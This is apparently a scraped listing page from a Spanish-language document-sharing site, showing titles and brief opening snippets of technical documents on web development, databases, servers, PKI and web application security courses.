Banco de la República Bogotá D. C., Colombia Subgerencia de Informática Departamento de Seguridad Informática MANUAL DE USUARIO PARA EL SERVICIO - SISTEMA DE GESTIÓN PKI DE USUARIOS ROAMING - USI-GI-56
Más detallesUNIVERSIDAD DE OVIEDO
UNIVERSIDAD DE OVIEDO ESCUELA POLITÉCNICA DE INGENIERÍA DE GIJÓN MÁSTER EN INGENIERÍA INFORMÁTICA TRABAJO FIN DE MÁSTER SPRING ROO ADD-ONS PARA PROTOTIPADO RÁPIDO JAVIER MENÉNDEZ ÁLVAREZ JULIO 2014 UNIVERSIDAD
Más detallesManual de NetBeans y XAMPP
Three Headed Monkey Manual de NetBeans y XAMPP Versión 1.0 Guillermo Montoro Delgado Raúl Nadal Burgos Juan María Ruiz Tinas Lunes, 22 de marzo de 2010 Contenido NetBeans... 2 Qué es NetBeans?... 2 Instalación
Más detallesHaga clic para modificar el estilo de título del patrón Haga clic para modificar el estilo de texto del patrón
texto del DESAFÍOS PARA ALCANZAR EL CUMPLIMIENTO: GUÍA DE IMPLEMENTACIÓN, INTEGRACIÓN DE LA SEGURIDAD EN EL CICLO DE VIDA DEL SOFTWARE, LABORATORIO PCI DSS COMPLIANT. FERMÍN GARDE FERNÁNDEZ RESPONSABLE
Más detallesMySQL: Guía de Referencia
Instituto Tecnologico Superior de Coatzacoalcos (ITESCO). MySQL: Guía de Referencia Farid Alfredo Bielma Lopez fbielma@fbielma.org http://fbielma.org/course/fbielma/curso_mysql.pdf Resumen del curso Algunas
Más detallesSoft4Web. Embedded Web Server + Program 11.14
Soft4Web 11.14 Qué es? Tecnología, dotada de un entorno de desarrollo con el cual se pueden crear aplicaciones Windows, donde el Servidor Web y la Aplicación Informática están integradasen un solo ejecutable
Más detallesPROGRAMACIÓN EN PHP. 1. Identificar las características y modalidad de programación bajo PHP.
Duración: 60 horas FUNDAMENTACIÓN DEL CURSO PROGRAMACIÓN EN PHP El Lenguaje PHP o Hypertext PreProcessor, al igual que C y Perl maneja programación estructurada, lo que le permite a los programadores con
Más detallesAGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web
Universidad ORT Uruguay Mejorando la Seguridad en Aplicaciones Web Ing. Cecilia Belletti Ing. Angel Caffa, MSc Ing. Isaac Rodríguez IntegraTICs 7 de diciembre, 2006 AGENDA Introducción La Web Promesas
Más detallesLABORATORIO DE RC: PRÁCTICA 4: IMPLEMENTACIÓN DE UN CLIENTE DE CORREO
UNIVERSIDADE DA CORUÑA Departamento de Tecnoloxías da Información e as Comunicacións LABORATORIO DE RC: PRÁCTICA 4: IMPLEMENTACIÓN DE UN CLIENTE DE CORREO PRÁCTICA 4: Implementación de un Cliente de Correo
Más detallesSoftware generador de documentos a través de la Web
Julia Patricia Melo Morín 1 Software generador de documentos a través de la Web 1 Contacto: patricia.melo@itspanuco.edu.mx Resumen Uno de los mayores problemas a los que se enfrentan las grandes corporaciones
Más detallesMS_80062 Introduction to Microsoft Dynamics AX 2009
Introduction to Microsoft Dynamics AX 2009 www.ked.com.mx Av. Revolución No. 374 Col. San Pedro de los Pinos, C.P. 03800, México, D.F. Tel/Fax: 52785560 Introducción En este curso ofrece a los alumnos
Más detallesS E G U R I D A D E N A P L I C A C I O N E S W E B
H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A
Más detallesDiseño dinámico de arquitecturas de información
Diseño dinámico de arquitecturas de información CARACTERISTICAS DEL SISTEMA Las organizaciones modernas basan su operación en la gestión del conocimiento, es decir, en el manejo de información que se presenta
Más detallesPresentación. Porqué formarte con nosotros?
Presentación Un Hacker Ético es un profesional dotado de habilidades para encontrar las debilidades o vulnerabilidades en los sistemas utilizando el mismo conocimiento y herramientas que un hacker malicioso,
Más detallesIntroducción a las redes de computadores
Introducción a las redes de computadores Contenido Descripción general 1 Beneficios de las redes 2 Papel de los equipos en una red 3 Tipos de redes 5 Sistemas operativos de red 7 Introducción a las redes
Más detalles3-ANÁLISIS DE VULNERABILIDADES
3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna
Más detallesVICEPRESIDENCIA DE OPERACIONES DEPARTAMENTO DE SISTEMAS
VICEPRESIDENCIA DE OPERACIONES DEPARTAMENTO DE SISTEMAS CONTENIDO INVITACIÓN A COTIZAR 1. ALCANCE...3 2. CONDICIONES TECNICAS...3 2.1 ANÁLISIS DE VULNERABILIDADES A LOS SERVIDORES Y FIREWALL... 3 2.1.1
Más detallesWindows Server 2003. Windows Server 2003
Windows Server 2003 Windows Server 2003 Es un sistema operativo de la familia Windows de la marca Microsoft para servidores que salió al mercado en el año 2003. Está basada en tecnología NT y su versión
Más detallesInfraestructura Tecnológica. Sesión 1: Infraestructura de servidores
Infraestructura Tecnológica Sesión 1: Infraestructura de servidores Contextualización La infraestructura de cualquier servicio o mecanismo es importante, define el funcionamiento de los elementos en que
Más detallesGLOSARIO. Arquitectura: Funcionamiento, estructura y diseño de una plataforma de desarrollo.
GLOSARIO Actor: Un actor es un usuario del sistema. Esto incluye usuarios humanos y otros sistemas computacionales. Un actor usa un Caso de Uso para ejecutar una porción de trabajo de valor para el negocio.
Más detallesLa interoperabilidad se consigue mediante la adopción de estándares abiertos. Las organizaciones OASIS y W3C son los comités responsables de la
Servicios web Introducción Un servicio web es un conjunto de protocolos y estándares que sirven para intercambiar datos entre aplicaciones. Distintas aplicaciones de software desarrolladas en lenguajes
Más detallesGuía de Instalación para clientes de WebAdmin
Panda Managed Office Protection Guía de Instalación para clientes de WebAdmin Tabla de contenidos 1. Introducción... 4 2. Instalación de Panda Managed Office Protection a partir de una instalación de Panda
Más detallesTutorial: Primeros Pasos con Subversion
Tutorial: Primeros Pasos con Subversion Introducción Subversion es un sistema de control de versiones open source. Corre en distintos sistemas operativos y su principal interfaz con el usuario es a través
Más detallesPOSGRADO EXPERTO.NET DESARROLLO DE SOFTWARE
POSGRADO EXPERTO.NET DESARROLLO DE SOFTWARE DESCRIPCIÓN Microsoft es una de las principales empresas dedicada al mundo de las tecnologías, haciendo grandes esfuerzos para ponerse a la cabeza de la actualidad
Más detallesDiplomado en Desarrollo de Aplicaciones WEB Avanzado (HTML, PHP, MySQL, Java Script)
Diplomado en Desarrollo de Aplicaciones WEB Avanzado (HTML, PHP, MySQL, Java Script) Objetivo: Tener la capacidad de manejar herramientas para el desarrollo de aplicaciones web a nivel avanzado. Entender
Más detallesProgramación páginas web JavaScript y PHP
PRESENTACIÓN Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología PHP y el servidor
Más detallesPRUEBAS DE SOFTWARE TECNICAS DE PRUEBA DE SOFTWARE
PRUEBAS DE SOFTWARE La prueba del software es un elemento crítico para la garantía de la calidad del software. El objetivo de la etapa de pruebas es garantizar la calidad del producto desarrollado. Además,
Más detallesNovedades de Microsoft Dynamics 2011
Novedades de Microsoft Dynamics 2011 Microsoft Dynamics CRM 2011 ofrece características nuevas y mejoradas que le ayudarán a aumentar la eficacia y la productividad de su organización. Interfaz de Microsoft
Más detallesQué es una aplicación web
Departamento de Lenguajes y Sistemas Informáticos Qué es una aplicación web Programación en Internet Curso 2006-2007 Índice Introducción Cliente Servidor Transferencia páginas web Entornos web Ventajas
Más detallesFOREST BPMS. Arquitectura Forest BPMS. Metodologia de implementación. Fase I Instalación
FOREST BPMS Arquitectura Forest BPMS Metodologia de implementación Fase I Instalación 1. Instalación del sistema de información Forest en los servidores provistos por la entidad Entregable: Documento de
Más detallesConfiguración de Aspel-SAE 6.0 para trabajar Remotamente
Configuración de Aspel-SAE 6.0 para trabajar Remotamente Para poder configurar Aspel-SAE 6.0 como Servidor Remoto, se necesita realizar lo siguiente: 1. Instalar y/o configurar el IIS que se tenga de acuerdo
Más detalles